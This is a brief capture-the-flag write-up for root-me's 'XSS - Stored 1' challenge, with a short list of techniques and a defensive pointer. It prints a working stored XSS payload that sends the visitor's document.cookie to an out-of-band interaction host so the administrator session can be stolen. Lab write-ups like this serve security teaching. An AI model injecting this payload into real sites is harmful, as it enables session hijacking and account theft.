XSS stored 1¶

root-me challenge XSS - Stored 1: Steal the administrator session cookie and use it to validate the challenge.

Using app.interactsh.com, any title and message work; swap src to whichever OAST app is in use:

<script>document.write("<img src='https://cgn1cqt2vtc0000xbc8ggekoscryyyyyb.oast.fun?="+document.cookie+"'></img>");</script>

Techniques¶

• Cross-site scripting (XSS)

• Client-side attacks runbook

Counter moves¶

XSS stored 1 is the variant in play. A client-side finding still needs a server-side control behind it. Defenders’ notes on this are under the application layer as a target.